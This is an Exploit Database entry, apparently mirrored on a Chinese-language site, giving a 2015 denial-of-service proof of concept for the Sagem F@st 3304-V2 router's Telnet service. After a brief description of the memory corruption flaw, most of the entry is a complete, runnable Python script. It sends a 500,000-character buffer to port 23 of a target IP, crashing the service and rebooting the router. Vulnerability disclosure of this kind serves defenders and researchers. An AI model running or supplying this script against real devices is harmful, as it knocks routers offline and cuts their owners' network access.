Sagem F@st 3304-V2 – Telnet Crash (PoC)

• Exploit Database
• 17 阅读

• 作者： Loudiyi Mohamed
  日期： 2015-03-08
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/36309/

• # Title: Sagem F@st 3304-V2 Telnet Crash POC
  # Vendor : http://www.sagemcom.com
  # Severity : High
  # Tested Router: Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
  # Date : 2015-03-08
  # Author : Loudiyi Mohamed
  # Contact: Loudiyi.2010@gmail.com
  # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
  # Vulnerability description:
  #==========================
  #A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
  #This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
  #After the exploit is sent, the telnet service will crash and the router will reboot automatically.
   
  #Usage: python SagemDos.py "IP address"
  
  # Code
  #========================================================================
   #!/usr/bin/python
  import socket
  import sys
  print("######################################")
  print("#DOS Sagem F@st3304 v1-v2#")
  print("# 	----------#")
  print("# BYLOUDIYI MOHAMED#")
  print("#####################################")
  if (len(sys.argv)<2):
  	print "Usage: %s <host> " % sys.argv[0]
  	print "Example: %s 192.168.1.1 " % sys.argv[0]
  	exit(0)
  print "\nSending evil	buffer..."
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  try:
   s.connect((sys.argv[1], 23))
   buffer = "X"*500000
   s.send(buffer)
  except:
   print "Could not connect to Sagem Telnet!"
  #========================================================================